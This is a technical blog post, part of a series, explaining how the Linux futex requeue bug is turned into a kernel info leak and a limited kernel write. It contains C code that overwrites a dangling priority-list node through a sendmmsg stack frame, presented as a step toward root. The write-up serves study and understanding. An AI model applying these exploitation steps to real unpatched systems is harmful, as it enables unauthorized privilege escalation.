Escalating Futex Vulnerability & How to Fix it

By |2018-09-24T05:03:18+00:00September 18th, 2014|

20140918-header

Link to part 1 of the series: The futex vulnerability

Last time we went over the two bugs in the futex kernel module and how these bugs allow us to potentially control a node in some kernel-residing linked list.

This time, we’ll discuss how to leverage these bugs in order to achieve a limited form of kernel write, or to be more precise: “write an uncontrolled value to a controlled address”.Before we continue, there are some concepts with which you ought to get familiar: doubly-linked lists and priority lists (plist) in the Linux kernel.

Escalating Futex

Doubly-Linked List 

I will assume you are familiar with the concept of linked lists, if not, I suggest reading the Wikipedia entry.

Now, the way linked lists are implemented in the kernel are somewhat unique. Usually, you’d find nodes where the next and prev pointers are an equal member of the node as the data it contains. Instead, in the Linux kernel, include/linux/list.h defines a list_head structure, which is to be embedded into various data structures and serves as a dynamic chain link. This way, a certain data structure can act as a node in several linked lists.

The definition of list_head is quite simple (as found in include/linux/types.h):

1

2

3

struct list_head {

struct list_head *next, *prev;

};

Escalating Futex

Just one more thing about this specific implementation of linked lists (i.e. in the kernel) is that they are always circular. A node is initialized to point to itself (both next and prev pointers), and inserting/removing nodes does not break the circle.

Priority List

Priority lists are slightly more complicated creatures. The idea is to allow each node to have a numeric priority assigned to it, and that inserting/removing items will always leave it ordered (from low to high priority).

Just like in linked lists, list_head is a structure one can embed in data nodes, so too, can plist_node be embedded in data nodes to specify their membership in priority-lists. The definition of plist_node is (taken from include/linux/plist.h):

1

2

3

4

5

struct plist_node {

int prio;

struct list_head prio_list;

struct list_head node_list;

};

Another thing is that plists are always accessed via a head node which is just a list_head which points to the first node_list node:

1

2

3

struct plist_head {

struct list_head node_list;

};

As you can see, essentially, priority-lists specify two linked-lists. This requires some explanation.

I’ll begin with node_list, this is just a linked list of all the nodes in the list, sorted by priority. On the other hand, prio_list contains only one node of each priority, again, sorted by priority.

Take for example the following list:

Escalating Futex

There are two possible cases of inserting a new node to the plist:

  • There is no node with the same priority in the list
  • There is already a node of the same priority in the list

Same goes for removing a node:

  • There are additional nodes with the same priority
  • The node removed is the last with its priority

Now that’s we’ve got that cleared out of the way, let’s review what the futex bug and what it gives us.

In the kernel, when a futex lock is contended, the lock object (an rt_mutex) has a priority list of rt_mutex_waiter associated with it:

1

2

3

4

5

6

7

8

9

10

11

12

struct rt_mutex {

raw_spinlock_t wait_lock;

struct plist_head wait_list; /* The “head” of a priority list of rt_mutex_waiter objects */

struct task_struct *owned;

};

struct rt_mutex_waiter {

struct plist_node list_entry; /* This is the node which is the part of rt_mutex’s wait_list */

struct plist_node pi_list_entry;

struct task_struct *task;

struct rt_mutex *lock;

};

Now if you recall, when we call futex_requeue the first time, it adds the rt_waiter, which resides in the stack frame of futex_wait_requeue_pi to the wait_list of the lock B:

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

/* kernel/futex.c */

static int futex_requeue(u32 __user *uaddr1, unsigned int flags,

u32 __user *uaddr2, int nr_wake, int nr_requeue,

u32 *cmpval, int requeue_pi)

{

ret = rt_mutex_start_proxy_lock(&pi_state->pi_mutex,

this->rt_waiter,

this->task, 1);

}

/* kernel/rtmutex.c */

int rt_mutex_start_proxy_lock(struct rt_mutex *lock,

struct rt_mutex_waiter *waiter,

struct task_struct *task, int detect_deadlock)

{

ret = task_blocks_on_rt_mutex(lock, waiter, task, detect_deadlock);

}

static int task_blocks_on_rt_mutex(struct rt_mutex *lock,

struct rt_mutex_waiter *waiter,

struct task_struct *task,

int detect_deadlock)

{

plist_add(&waiter->list_entry, &lock->wait_list);

}

When we call futex_requeue the second time, we cause futex_wait_requeue_pi to return without removing rt_waiter from the list.

In essence, the waiter list will look like this:

Escalating Futex

Notice how in the last diagram the pointer arrows to the bugged waiter are no longer bi-directional. There are nodes in the waiter list which point to the bugged waiter’s node, but it points to some other place.

Info Leak

Here is when this starts getting interesting (and also where my insistence on explaining how priority lists becomes apparent).

Insertion in a priority-list works by scanning the list (starting from plist_head), until a node with a priority larger than the inserted node’s is encountered. Then, the node is inserted before that node:

1

2

3

4

5

6

7

void plist_add(struct plist_node *node, struct plist_head *head)

{

ins_node:

list_add_tail(&node->node_list, node_next);

}

The reason this is useful is that list_add_tail adds a node between itself, and its prev node. In our case, the bugged node’s next can be set to point to an arbitrary memory address.

You can probably see where it’s going. We can force next to point to some memory which is shared to user and kernel, where we crafted our own node and it’s preceding node:

Escalating Futex

After adding a new waiter to the list via futex_lock_pi from a thread with a controlled priority, we can make it add itself before the fake node, so the list will look like this:

Escalating Futex
Lo and behold, we have an object in the kernel whose address is visible from user space!

The method by which we overwrite the bugged rt_waiter is invoking a blocking system call immediately following the return of futex_wait_requeue_pi to user space. What we require of this system call is:

  • It is deep enough in the stack to override the interesting parts of rt_waiter
  • We can control the data in the stack frame of that system call

As luck may have it, there are several such system calls. The ones used in TowelRoot are: sendmsg, sendmmsg, recvmsg, recvmmsg. We’ll pick sendmmsg.

The invocation of sendmmsg and associated structures are as follows:

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

int sendmmsg(int sockfd, struct mmsghdr *msgvec, unsigned int vlen,

unsigned int flags);

struct mmsghdr {

struct msghdr msg_hdr;

unsigned int msg_len;

};

struct msghdr {

void *msg_name;

socklen_t msg_namelen;

struct iovec *msg_iov;

size_t msg_iovlen;

void *msg_control;

size_t msg_controllen;

int msg_flags;

};

struct iovec {

void *iov_base;

__kernel_size_t iov_len;

};

Playing a bit with gdb, we can see that in the stack frame of ___sys_sendmsg, the address range of the dangling rt_mutex overlaps with both iovstack and address like this (I cut away the uninteresting parts):

Escalating Futex

Now, address is copied from the buffer supplied in msgvec.msg_name, while iovstack is copied from msgvec.msg_iov. This means our setup ought to look like this:

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

/* Assume that:

* 1. The socket (sock) has already been set up and connected.

* 2. fake_waiter is a pointer to shared memory.

*/

int i = 0;

struct mmsghdr msgvec[1];

struct iovec msg_iov[8];

char databuf[128];

struct rt_mutex_waiter *k_waiter;

memset(databuf, 0, sizeof(databuf));

/* Load up msg_iov with legal values */

for (i = 0; i < __count_of(msg_iov); ++i) { /* The address loaded to iov_base should be of a mapped memory * area, otherwise the kernel will freak out over it */ msg_iov[i].iov_base = (void *)&fake_waiter; msg_iov[i].iov_len = 0x10; } /* The top 8 bytes of address overlap with rt_waiter.list_entry.prio and * rt_waiter.list_entry.prio_list.next */ k_waiter = (struct rt_mutex_waiter *)(databuf + sizeof(databuf) – 8); k_waiter->list_entry.prio = 120 + 12; /* Preserve the node’s priority */

k_waiter->list_entry.prio_list.next = &fake_waiter->list_entry.prio_list;

/* Now we set up the structure that gets passed to sendmmsg */

msgvec[0].msg_hdr.msg_name = databuf;

msgvec[0].msg_hdr.msg_namelen = sizeof(databuf);

msgvec[0].msg_hdr.msg_iov = msg_iov;

msgvec[0].msg_hdr.msg_iovlen = __count_of(msg_iov);

msgvec[0].msg_hdr.msg_control = NULL;

msgvec[0].msg_hdr.msg_controllen = 0;

msgvec[0].msg_hdr.msg_flags = 0;

msgvec[0].msg_len = 0;

sendmmsg(sock, msgvec, __count_of(msgvec), 0);

Kernel Write

Using the same trick, we can override the bugged waiter objects with addresses in the kernel (now that we have an anchor address it’s relatively easy to pinpoint specific data in the kernel), and trigger another insertion.

This time, instead of writing a to shared memory, we tricked the kernel into writing to kernel memory.

Now that we’ve covered how the futex bugs can be escalated to kernel read/write (though with limited functionality), we can start thinking how to use these building blocks in order to achieve arbitrary read/write to the kernel, and ultimately gaining root access.

Next time we’ll discuss how we can use this memory write ability, albeit limited, to achieve a full-blown kernel read/write access, and ultimately gain root permissions.

About the Author:

Scroll Up
WordPress Video Lightbox Plugin